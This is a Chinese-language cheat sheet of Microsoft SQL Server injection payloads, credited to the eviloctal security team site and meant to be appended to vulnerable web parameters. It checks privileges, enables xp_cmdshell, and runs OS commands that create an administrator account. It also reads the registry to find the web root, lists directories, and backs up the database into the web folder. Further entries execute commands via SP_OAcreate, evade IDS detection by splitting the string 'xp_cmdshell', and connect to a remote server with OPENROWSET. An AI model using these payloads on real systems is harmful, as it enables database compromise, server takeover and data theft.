信息来源:邪恶八进制信息安全团队(
www.eviloctal.com)
检测权限 sysadmin|and 1=(select IS_SRVROLEMEMBER('sysadmin'))
检测权限 serveradmin|and 1=(select IS_SRVROLEMEMBER('serveradmin'))
检测权限 setupadmin|and 1=(select IS_SRVROLEMEMBER('setupadmin'))
检测权限 securityadmin|and 1=(select IS_SRVROLEMEMBER('securityadmin'))
检测权限 diskadmin|and 1=(select IS_SRVROLEMEMBER('diskadmin'))
检测权限 bulkadmin|and 1=(select IS_SRVROLEMEMBER('bulkadmin'))
检测权限 db_owner|and 1=(select IS_SRVROLEMEMBER('db_owner'))
====================|
检测 xp_cmdshell (CMD命令)|and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_cmdshell')
检测 xp_regread (注册表读取功能)|and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_regread')
检测 sp_makewebtask (备份功能)|and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_makewebtask')
检测 sp_addextendedproc|and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_addextendedproc')
检测 xp_subdirs 读子目录|and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_subdirs')
检测 xp_dirtree 读子目录|and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_dirtree')
====================|
修改内容|; UPDATE 表名 set 字段=内容 where 1=1
====================|
XP_CMDSHELL检测|;exec master..xp_cmdshell 'dir c:\'
恢复 XP_CMDSHELL|;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
用 XP_CMDSHELL 添加用户 paf|;exec master.dbo.xp_cmdshell 'net user paf pafpaf /add'
XP_CMDSHELL把用户加到admin组 paf|;exec master.dbo.xp_cmdshell 'net localgroup administrators paf /add'
====================|
创建表 ddd|;create table [dbo].[ddd] ([dstr][char](255));
检测表段 ddd|and exists (select * from ddd)
读取WEB的位置 (读注册表)|;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/',@result output insert into ddd (dstr) values(@result);--
爆出WEB的绝对路径(显错模式)|and 1=(select count(*) from ddd where dstr > 1)
删除表 ddd|;drop table ddd;--
====================|
创建查看目录的表 dirs|;create table dirs(paths varchar(100), id int)
把查看目录的内容加入表 dirs 'c:\'|;insert dirs exec master.dbo.xp_dirtree 'c:\'
爆目录的内容 dirs|and 0<>(select top 1 paths from dirs)
备份数据库|declare @a sysname; set @a=db_name();backup 数据库名 @a to disk='c:\inetpub\wwwroot\down.bak';--
删除表 dirs|;drop table dirs;--
====================|
创建表 temp|;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
把驱动盘列表加入 temp 表|;insert temp exec master.dbo.xp_availablemedia;--
删除表 temp|;delete from temp;--
====================|
创建表 dirs|;create table dirs(paths varchar(100), id int);--
获得子目录列表 xp_subdirs|;insert dirs exec master.dbo.xp_subdirs 'c:\';--
爆出内容(显错模式)|and 0<>(select top 1 paths from dirs)
删除表 dirs|;delete from dirs;--
====================|
创建表 dirs|;create table dirs(paths varchar(100), id int)--
用 xp_cmdshell 查看目录内容|;insert dirs exec master..xp_cmdshell 'dir c:\'
删除表dirs|;delete from dirs;--
====================|
检测 SP_OAcreate (执行命令)|and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'SP_OAcreate')
执行CMD命令 SP_OAcreate|;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add'
建目录 SP_OAcreate|;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c md c:\inetpub\wwwroot\1111'
创建一个虚拟目录E盘|;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认 Web 站点" -v "e","e:\"'
设置虚拟目录为可读 e |;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'
启动 server 服务|;exec master..xp_servicecontrol 'start', 'server'
绕过IDS的检测的 xp_cmdshell|;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
开启远程数据库1|; select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1' )
开启远程数据库2|;select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table'
